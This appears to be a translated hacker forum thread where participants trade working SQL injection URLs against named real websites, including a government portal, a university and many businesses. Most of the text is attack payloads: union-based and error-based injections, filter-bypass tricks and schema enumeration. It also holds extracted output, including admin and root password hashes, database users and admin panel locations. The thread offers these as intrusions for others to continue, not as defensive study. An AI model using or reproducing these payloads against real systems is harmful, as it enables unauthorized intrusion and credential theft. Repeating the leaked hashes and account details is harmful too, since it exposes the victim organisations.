old.lipstick.ru First we log in, login and password 'Or 1=1/* Then we go here: Code: http://old.lipstick.ru/smscenter.php?view=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a, password),6,7+FROM+users+LIMIT+0,1/* admin:399a2ece6b34ff6e314d87301af489f0 Version 4. Can't get into the admin panel, there's a problem with the headers
Code: http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* For some reason it won't go any further...(
Incoming data is filtered there, try AES_DECRYPT AES_ENCRYPT http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),15/*
Code: http://www.bmeia.gv.at/templates/popup.php3?f_id=155&LNG=de&version=&BildID=-189+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x71),0x71)+from+mysql.user/* root:*DE342DA364B639606FF4447B24338C1318FB181C:pseudo
Code: http://www.bmeia.gv.at/robots.txt admin panel:_https://cms.bmeia.gv.at/truman/index.php3 the login/password don't work...
http://www.aziendeinvista.it/ Code: http://www.aziendeinvista.it/view_news.asp?id=-1+union+select+1,concat_ws(0x3a,Passw,Admin),3,4,5,6,7+from+admin-- http://www.tissuper.com.au/ Code: http://www.tissuper.com.au/newsline/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admin_user)--
Code: http://www2.umaine.edu/graduate/article.php?id=-999'+union+select+1,version(),user(),4/* version() - 4.1.20 user() - jwef@localhost
www.avem.fr Code: http://www.avem.fr/news?id=-0303+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* 4.0.25-standard-log:[email protected]:avemlfod
2 Tyc00n Try this query: Code: http://www2.umaine.edu/graduate/article.php?id=-999'+UNION+SELECT+1,concat(username,0x3a,password),3,4+from+users+limit+0,1/*
Code: http://www.neurope.eu/view_news.php?id=-1+union+select+1,USER(),VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,DATABASE(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/* neweuro_kostas@localhost 4.1.22-standard neweuro_corporate
Code: http://wap.freesoft.ru/get_file.wap.wml?id=99999'+UNION+SELECT+1,2,3,4,5/* get@localhost:get:4.1.14
http://www.starww.com/ Code: http://www.starww.com/view_news.asp?id=1+or+1=(SELECT+TOP+1+cast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(UserPass+as+nvarchar)+from+AccountMaster)--
atlas.cz I don't know whether this has been posted before or not... Of the useful ones, there is access only to Zabava Code: http://wap.atlas.cz/tv.asp?id=-99+UNION+SELECT+name,2+from+master..sysdatabases--
http://www.athletesadvance.com/ Code: http://www.athletesadvance.com/sample_profile.asp?view_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins+where+admin_id=1)--
http://www.sufficiencyeconomy.org/show.php?Id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15+from+information_schema.tables/* Next, we use LIMIT. P.S. Interesting tables: useradmin, member, PROFILING
HTML: http://www.salienagolf.lv/?pane=nxt&lang=1&gid=22&n=1+union+select+0,convert(concat(USER(),VERSION(),DATABASE())+using+latin1),2,3,4,5,6,7,8,9,10,11,12/* USER:salienagolfcom@localhost VERSION:4.1.18 DATABASE:salienagolfcom
http://www.fllandforsale.biz/email_rep.php?id=4/*' http://www.fllandforsale.biz/email_rep.php?id=4+and+1=1/*' http://www.fllandforsale.biz/email_rep.php?id=4+order+by+22/*' http://fllandforsale.biz/searchRegions.php?pType=3/* http://fllandforsale.biz/searchRegions.php?pType=3+and+1=1/* http://fllandforsale.biz/searchRegions.php?pType=3+order+by+1/* http://fllandforsale.biz/showListing.php?type=property&id=348+and+1/* http://fllandforsale.biz/showListing.php?type=property&id=348+order+by+4/* http://www.fllandforsale.biz/email_rep.php?id=-4+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,0,11,12,13,14,15,16,17,18,19,20,21,22 4.1.20::h7t6Y54@localhost::flland p.s. it's version 4 and I couldn't guess the tables with light brute-forcing; there are no rights to read either http://www.epdlp.com/clasica.php?id=397+and+1=1/*' http://www.epdlp.com/clasica.php?id=397+order+by+14/*' http://www.epdlp.com/clasica.php?id=397+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*' http://www.epdlp.com/clasica.php?id=397+union+select+1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14/*' 5.0.45::[email protected]::epdlp http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=''+limit+100,11/*' clasica::top100 clasica:bra clasica::nommusico clasica::apemusico clasica::fecha http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name='clasica'+limit+1,4/*' texto::apeautor http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_schema,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+column_name+like+'%mail%'+limit+1,2/*'
http://www.epdlp.com/clasica.php?id=397+union+select+1,2,convert(concat_ws(0x3a3a,table_schema,table_name,column_name)+using+latin1),4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name='felicitaciones'/*' felicitaciones epdlp::felicitaciones::comentario epdlp::felicitaciones::ID epdlp::felicitaciones::anio epdlp::felicitaciones::mes epdlp::felicitaciones::fecha epdlp::felicitaciones::dia epdlp::felicitaciones::hora epdlp::felicitaciones::email epdlp::felicitaciones::contenido p.s. it's version 5, there are a lot of tables, you can look for something)) /*no rights to read files =\*/